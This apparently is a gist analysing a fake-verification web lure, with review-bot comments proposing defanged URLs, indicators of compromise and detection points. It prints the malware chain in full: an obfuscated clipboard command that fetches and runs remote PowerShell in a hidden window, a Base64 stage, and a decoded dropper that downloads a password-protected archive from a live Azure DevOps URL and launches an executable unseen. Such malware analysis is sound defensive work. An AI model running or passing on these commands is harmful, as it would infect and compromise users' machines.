Last active
April 14, 2025 17:47
Revisions
-
danneu revised this gist
Apr 14, 2025 . No changes.
-
danneu created this gist
Apr 14, 2025 .
@@ -0,0 +1,3 @@ # The website gets you to win-r + cmd-v + enter. This is what it put in your clipboard: cmd /c powershell -w hidden -c "$SESSION='i'+'e'+'x'; $SOCKET='i'+'w'+'r'; $UPDATE='https:/'+'/kutt.i'+'t/ReStarT'; &($SESSION) ((&($SOCKET) $UPDATE -UseBasicParsing).Content)"# Initiate forse restart browser
@@ -0,0 +1,3 @@ # https://kutt.it/ReStarT redirects to a snippet site with this payload: $BIbfLCXe=[System.Text.Encoding]::Unicode; $kUwulDoJ=[Convert]::FromBase64String('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'); Invoke-Expression (${BIbfLCXe}.GetString(${kUwulDoJ}))
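Review bot: In the first file (the clipboard command), the header comment explains how the page gets the command executed but not what it does, and the trailing `# Initiate forse restart browser` is left unexplained. I would add a line such as `# 'i'+'e'+'x' and 'i'+'w'+'r' rebuild iex and iwr at run time to dodge string matching; the command fetches the URL and executes the response in a hidden window`, and note that the trailing comment is presumably the decoy text left visible at the end of the Run box. For triage it is worth saying that commands entered through Win+R are recorded under the user's `RunMRU` registry key. The process chain to hunt for is `explorer.exe` starting `cmd.exe`, which then starts a hidden `powershell.exe`.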
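Review bot: In the second file (the shortener payload), the comment writes the shortener address as a live link and does not name the encoding, so a reader has to work out how to inspect the blob safely. I would defang it and spell out the decode: `# hxxps://kutt[.]it/ReStarT redirects to a snippet site; the payload is Base64 of UTF-16LE text handed to Invoke-Expression`. A second comment, `# To inspect: print the GetString() result instead of passing it to Invoke-Expression`, keeps anyone reproducing the analysis from running it. On hosts with PowerShell script block logging enabled the decoded text should also appear in event 4104, which is worth naming as the place to confirm execution.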
@@ -0,0 +1,64 @@ # This is what the base64 blob decodes to: $zipUrl = "https://dev.azure.com/downupdtes/0be79736-6ca9-491b-be21-001593e48d88/_apis/git/repositories/ba03a5b6-2221-4f00-ad12-11f9eaa7a9bd/items?path=/run47.zip&versionDescriptor%5BversionOptions%5D=0&versionDescriptor%5BversionType%5D=0&versionDescriptor%5Bversion%5D=main&resolveLfs=true&%24format=octetStream&api-version=5.0&download=true" $password = "Qweqwe123123" $baseFolder = "$env:APPDATA\NVIDIA\UpdateService" $maxAttempts = 3 $downloaded = $false for ($i = 1; $i -le $maxAttempts; $i++) { $rand = -join ((65..90) + (97..122) + (48..57) | Get-Random -Count 5 | % {[char]$_}) $targetFolder = "$baseFolder\Temp$rand" $zipPath = "$targetFolder\updatepack.zip" $extractPath = "$targetFolder\Cache" try { if (-not (Test-Path $targetFolder)) { New-Item -ItemType Directory -Path $targetFolder -Force | Out-Null New-Item -ItemType Directory -Path $extractPath -Force | Out-Null # zSanhNjRebxegCpO } $netVer = (Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full" -ErrorAction SilentlyContinue).Release if ($netVer -and $netVer -ge 378389) { Add-Type -AssemblyName "System.Net.Http" $client = [System.Net.Http.HttpClient]::new() $client.DefaultRequestHeaders.Add("User-Agent", "Mozilla/5.0") $bytes = $client.GetByteArrayAsync($zipUrl).Result [System.IO.File]::WriteAllBytes($zipPath, $bytes) } else { $wc = New-Object System.Net.WebClient $wc.Headers.Add("User-Agent", "Mozilla/5.0") $wc.DownloadFile($zipUrl, $zipPath) } if (Test-Path $zipPath) { $downloaded = $true break } } catch { # XsnzJTzWNriwAqVZ Start-Sleep -Seconds 1 } } if (-not $downloaded) { exit } Add-Type -AssemblyName System.IO.Compression.FileSystem [IO.Compression.ZipFile]::ExtractToDirectory($zipPath, $targetFolder) $sevenZipPath = Get-ChildItem -Path $targetFolder -Recurse -Filter "7zr.exe" | Select-Object -First 1 $archive7z = Get-ChildItem -Path $targetFolder -Recurse -Filter "*.7z" | Select-Object -First 1 # QubMKrbsrnUFtBFP if 
(-not $sevenZipPath -or -not $archive7z) { exit } Start-Process -FilePath $sevenZipPath.FullName ` -ArgumentList "x", "`"$($archive7z.FullName)`"", "-o$extractPath", "-p$password", "-y" ` -WindowStyle Hidden -Wait $exeFile = Get-ChildItem -Path $extractPath -Recurse -Filter *.exe | Select-Object -First 1 if ($exeFile) { Start-Process -FilePath $exeFile.FullName -WindowStyle Hidden }
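Review bot: The only annotation on the decoded stage is `# This is what the base64 blob decodes to:`, so the artefacts a responder needs are buried in the script. I would add a short indicator block at the top, e.g. `# IoCs: dev.azure.com project 'downupdtes' (run47.zip); %APPDATA%\NVIDIA\UpdateService\Temp<5 chars>\updatepack.zip and \Cache; 7zr.exe started with -p<password> -y and -WindowStyle Hidden`. It is also worth stating that the inner `.7z` is password-protected, which presumably keeps the final executable out of reach of content scanning on the download. Detection therefore has to rest on behaviour: PowerShell writing under a fake NVIDIA folder in `%APPDATA%`, then starting an `.exe` from `Cache` with a hidden window. Nothing in these 64 lines sets up persistence or cleans up after itself, so the write-up should say that whatever the launched executable does next is not covered here.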